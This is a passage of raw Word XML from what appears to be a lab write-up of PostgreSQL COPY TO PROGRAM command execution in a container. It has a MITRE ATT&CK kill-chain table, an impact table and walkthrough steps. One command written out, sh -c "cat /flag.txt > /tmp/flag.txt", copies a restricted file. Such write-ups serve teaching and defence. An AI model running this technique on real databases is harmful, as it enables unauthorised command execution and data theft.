      <w:r w:rsidRPr="00A600DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The attacker abuses:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA487F" w:rsidRPr="00A600DE" w:rsidRDefault="00EA487F" w:rsidP="0027619E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA487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EDE21ED" wp14:editId="059CC6B9">
            <wp:extent cx="4630588" cy="753534"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="143666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61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6136" cy="7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DE" w:rsidRPr="00A600DE" w:rsidRDefault="00A24F20" w:rsidP="00A24F20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A24F20">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The shell command sh -c "cat /flag.txt &gt; /tmp/flag.txt" runs a shell, reads the contents of /flag.txt using cat, and redirects that output into a new file at /tmp/flag.txt. This effectively copies the flag from a restricted location into a more accessible path inside the container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidRDefault="00A600DE" w:rsidP="006C410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2.4</w:t>
      </w:r>
      <w:r w:rsidR="0027619E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Kill Chain (MITRE ATT&amp;CK)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16"/>
        <w:gridCol w:w="2443"/>
        <w:gridCol w:w="1275"/>
        <w:gridCol w:w="4172"/>
      </w:tblGrid>
      <w:tr w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidTr="006C4102">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="006C4102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Phase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27619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="006C4102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Tactic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27619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="006C4102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Technique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27619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="006C4102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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="006C4102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Reconnaissance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T1595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Attacker identifies PostgreSQL service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="006C4102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Weaponization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T1059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Prepares COPY TO PROGRAM payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="006C4102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Delivery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T1190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Executes SQL via psql in container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="006C4102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Exploitation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T1203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PostgreSQL executes OS command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="006C4102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Installation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T1105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Writes flag to /tmp/flag.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="006C4102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Command &amp; Control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T1059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Shell execution through DB engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="006C4102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Actions on Objectives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T1005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Extract /flag.txt content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007D3F98" w:rsidRPr="00B867F6" w:rsidRDefault="007D3F98" w:rsidP="007D3F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D3F98" w:rsidRPr="00EA487F" w:rsidRDefault="006C4102" w:rsidP="007D3F98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EA487F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2.5 </w:t>
      </w:r>
      <w:r w:rsidR="007D3F98" w:rsidRPr="00EA487F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Impact Statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D3F98" w:rsidRDefault="007D3F98" w:rsidP="007D3F98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An attacker successfully exploiting this vulnerability can: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88"/>
        <w:gridCol w:w="5450"/>
      </w:tblGrid>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidTr="006C4102">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="0027619E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Impact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27619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="0027619E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27619E" w:rsidRPr="0027619E" w:rsidTr="006C4102">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="0027619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OS Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidRDefault="0027619E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7619E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Run arbitrary shell commands inside container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidTr="006C4102">
        <w:trPr>
          <w:trHeight w:val="414"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="0027619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Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidRDefault="0027619E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7619E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Escape database-level restrictions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidTr="006C4102">
        <w:trPr>
          <w:trHeight w:val="421"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="0027619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Sensitive File Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidRDefault="0027619E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7619E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Read /flag.txt and system files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidTr="006C4102">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="0027619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Container Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidRDefault="0027619E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7619E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Full control of PostgreSQL container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidTr="006C4102">
        <w:trPr>
          <w:trHeight w:val="418"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="006C4102" w:rsidRDefault="0027619E" w:rsidP="0027619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C410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Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0027619E" w:rsidRPr="0027619E" w:rsidRDefault="0027619E" w:rsidP="0027619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7619E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Extract internal application data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EA487F" w:rsidRDefault="00AE65E8" w:rsidP="00EA487F">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/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60CD1D7" wp14:editId="4D5040CA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2548255</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>295910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2827655" cy="1556385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="214984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05E29D8" wp14:editId="2BCE9C41">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>33655</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>292100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1938655" cy="1915160"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1242456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4102" w:rsidRPr="006C410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2</w:t>
      </w:r>
      <w:r w:rsidR="007D3F98" w:rsidRPr="006C410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.6 Exploitation Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B0AA5" w:rsidRDefault="007B0AA5" w:rsidP="00DD38FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007B0AA5" w:rsidRDefault="007B0AA5" w:rsidP="00DD38FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007B0AA5" w:rsidRDefault="007B0AA5" w:rsidP="00DD38FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007B0AA5" w:rsidRDefault="007B0AA5" w:rsidP="00DD38FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007B0AA5" w:rsidRDefault="00AE65E8" w:rsidP="00DD38FF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3EE786" wp14:editId="64823700">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2548255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>162136</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3242310" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="915491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1438B" w:rsidRPr="00ED0399" w:rsidRDefault="0031438B" w:rsidP="007B0AA5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Snippet of COPY TO CVE Compose </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>yaml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EE7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0.65pt;margin-top:12.75pt;width:255.3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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="0031438B" w:rsidRPr="00ED0399" w:rsidRDefault="0031438B" w:rsidP="007B0AA5">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi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Snippet of COPY TO CVE Compose </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>yaml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B0AA5" w:rsidRDefault="00AE65E8" w:rsidP="00DD38FF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04322B" wp14:editId="725020E0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>33655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>161925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2023110" cy="279400"/>
                <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="137030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279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1438B" w:rsidRPr="00506BFD" w:rsidRDefault="0031438B" w:rsidP="007B0AA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File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4322B" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:2.65pt;margin-top:12.75pt;width:159.3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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="0031438B" w:rsidRPr="00506BFD" w:rsidRDefault="0031438B" w:rsidP="007B0AA5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File Structure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E65E8" w:rsidRDefault="00AE65E8" w:rsidP="00AE65E8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE65E8" w:rsidRDefault="00AE65E8" w:rsidP="00AE65E8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AE65E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82A8C4B" wp14:editId="192C3746">
            <wp:extent cx="5943600" cy="554990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1250225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5E8" w:rsidRDefault="00AE65E8" w:rsidP="00AE65E8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="0031438B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0031438B">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="0031438B">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA487F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="0031438B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Logging in as Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE65E8" w:rsidRPr="00AE65E8" w:rsidRDefault="00AE65E8" w:rsidP="00AE65E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05A2FC" wp14:editId="5935BCC6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>15875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>939165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4022725" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1435707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2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1438B" w:rsidRPr="009A6B20" w:rsidRDefault="0031438B" w:rsidP="00AE65E8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Verifying Privileges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5A2FC" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:1.25pt;margin-top:73.95pt;width:316.7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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="0031438B" w:rsidRPr="009A6B20" w:rsidRDefault="0031438B" w:rsidP="00AE65E8">
                      <w:pPr>
                        <w:pStyle w:val="Caption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Verifying Privileges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E65E8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C7D4E0B" wp14:editId="7F1AFCBB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>16088</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>67098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4023359" cy="815340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="78587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26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59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65E8" w:rsidRDefault="00AE65E8" w:rsidP="00AE65E8">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE65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E65E8" w:rsidRPr="00AE65E8" w:rsidRDefault="00AE65E8" w:rsidP="00AE65E8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE65E8" w:rsidRDefault="00AE65E8" w:rsidP="00AE65E8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AE65E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E4BE496" wp14:editId="36FA204C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>32597</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4030980" cy="838200"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="20603603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65E8" w:rsidRDefault="00AE65E8" w:rsidP="007B0AA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE65E8" w:rsidRDefault="00AE65E8" w:rsidP="007B0AA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE65E8" w:rsidRDefault="00AE65E8" w:rsidP="007B0AA5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D22EF9" wp14:editId="3EA19B73">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>33232</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>211032</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4030980" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="13621364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1438B" w:rsidRDefault="0031438B" w:rsidP="00AE65E8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Planted Flag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="0031438B" w:rsidRPr="00EA487F" w:rsidRDefault="0031438B" w:rsidP="00EA487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22EF9" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:2.6pt;margin-top:16.6pt;width:317.4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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="0031438B" w:rsidRDefault="0031438B" w:rsidP="00AE65E8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Planted Flag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="0031438B" w:rsidRPr="00EA487F" w:rsidRDefault="0031438B" w:rsidP="00EA487F"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA487F" w:rsidRDefault="00EA487F" w:rsidP="007B0AA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA487F" w:rsidRDefault="00EA487F" w:rsidP="007B0AA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA487F" w:rsidRDefault="00EA487F" w:rsidP="007B0AA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA487F" w:rsidRDefault="00EA487F" w:rsidP="007B0AA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA487F" w:rsidRDefault="00EA487F" w:rsidP="007B0AA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA487F" w:rsidRDefault="00EA487F" w:rsidP="007B0AA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A6328" w:rsidRDefault="006A6328" w:rsidP="007B0AA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA487F" w:rsidRPr="00EA487F" w:rsidRDefault="00EA487F" w:rsidP="007B0AA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A487F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="007B0AA5" w:rsidRPr="00EA487F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tep 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Create the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA487F" w:rsidRPr="00A24F20" w:rsidRDefault="00EA487F" w:rsidP="00A24F20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EA487F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57380D66" wp14:editId="6CE12682">
            <wp:extent cx="5943600" cy="4309110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6883435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87F" w:rsidRPr="00A24F20" w:rsidRDefault="007B0AA5" w:rsidP="00A24F20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EA487F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00EA487F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EA487F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1C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Make </w:t>
      </w:r>
      <w:r w:rsidR="00EA487F" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exploit Executable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F39A509" wp14:editId="017D16DA">
            <wp:extent cx="5943600" cy="940332"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="934151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19E" w:rsidRPr="00EA487F" w:rsidRDefault="00DD38FF" w:rsidP="00DD38F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A487F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E47735D" wp14:editId="17E33477">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-42968</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>236855</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="972820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="249344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12" t="48532" r="712" b="2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19E" w:rsidRPr="00EA487F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00EA487F" w:rsidRPr="00EA487F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27619E" w:rsidRPr="00EA487F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27619E" w:rsidRPr="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>R</w:t>
